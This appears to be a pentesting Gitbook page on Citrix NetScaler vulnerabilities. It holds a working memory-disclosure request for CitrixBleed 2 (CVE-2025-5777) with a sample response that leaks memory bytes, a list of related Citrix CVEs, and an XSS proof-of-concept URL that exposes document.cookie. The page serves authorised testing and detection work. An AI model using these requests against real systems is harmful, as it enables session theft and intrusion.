Citrix
Citrix Exploit
CitrixBleed 2 - CVE-2025-5777
Citrix Netscaler Memory Disclosure
Detection
POST /p/u/doAuthentication.do HTTP/1.0
Host: target
User-Agent: watchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowr
Content-Length: 5
Connection: keep-alive
loginResponse:
HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 1962
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/vnd.citrix.authenticateresponse-1+xml; charset=utf-8
X-Citrix-Application: Receiver for Web
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<AuthenticateResponse
xmlns="<http://citrix.com/authentication/response/1>">
<Status>success</Status>
<Result>more-info</Result>
<StateContext>bG9naW5zY2hlbWE9ZGVmYXVsdA==</StateContext>
<AuthenticationRequirements>
<PostBack>/p/u/doAuthentication.do</PostBack>
<CancelPostBack>/p/u/doLogoff.do</CancelPostBack>
<CancelButtonText>Cancel</CancelButtonText>
<Requirements>
<Requirement>
<Credential>
<Type>none</Type>
</Credential>
<Label>
<Type>nsg-login-heading</Type>
<Text>nsg_loginHeading</Text>
</Label>
</Requirement>
<Requirement>
<Credential>
<ID>login</ID>
<SaveID>login</SaveID>
<Type>username</Type>
</Credential>
<Label>
<Text>nsg_username</Text>
<Type>nsg-login-label</Type>
</Label>
<Input>
<Text>
<ReadOnly>false</ReadOnly>
<InitialValue>É|¼C÷PkÓßYsa5ÊÞÅÐ^Ð|@ºJZõ¶@¹^ì¶Uã7Kèg Oë@¼~hL1{Xövn^ÐÛ·¹8dp}°$üüÇ)7
(÷æ¾èÂpAgc¼TowrwatchTowrw</InitialValue>
<Constraint>.+</Constraint>
</Text>
</Input>
</Requirement>
<Requirement>
<Credential>
<ID>passwd</ID>
<SaveID>passwd</SaveID>
<Type>password</Type>
</Credential>
<Label>
<Text>nsg_password1</Text>
<Type>nsg-login-label</Type>
</Label>
<Input>
<Text>
<Secret>true</Secret>
<Constraint>.+</Constraint>
</Text>
</Input>
</Requirement>
<Requirement>
<Credential>
<ID>savecredentials</ID>
<SaveID></SaveID>
<Type>savecredentials</Type>
</Credential>
<Label>
<Text>Remember my credentials</Text>
<Type>plain</Type>
</Label>
<Input>
<AssistiveText></AssistiveText>
<CheckBox>
<InitialValue>false</InitialValue>
</CheckBox>
</Input>
</Requirement>
<Requirement>
<Credential>
<ID>nsg-x1-logon-button</ID>
<Type>none</Type>
</Credential>
<Input>
<Button>Log On</Button>
</Input>
<Label>
<Type/>
</Label>
</Requirement>
<Requirement>
<Credential>
<ID>l20n-error</ID>
<SaveID></SaveID>
<Type>none</Type>
</Credential>
<Label>
<Text>Try again after some time or contact your help desk</Text>
<Type>nsg-l20n-error</Type>
</Label>
<Input/>
</Requirement>
</Requirements>
</AuthenticationRequirements>
</AuthenticateResponse>PoC
CVE-2024-xxxx - Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE
CVE-2024-8068 and CVE-2024-8069
CVE-2023-4966 - Citrix Bleed: Leaking Session Tokens
CVE-2023-24488
XSS and Open Redirec in Citrix ADC and Citrix Gateway
PoC:
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3ENuclei Template:
CVE-2023-3519 - Citrix ADC RCE
Citrix VPX 13.1-48.47
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated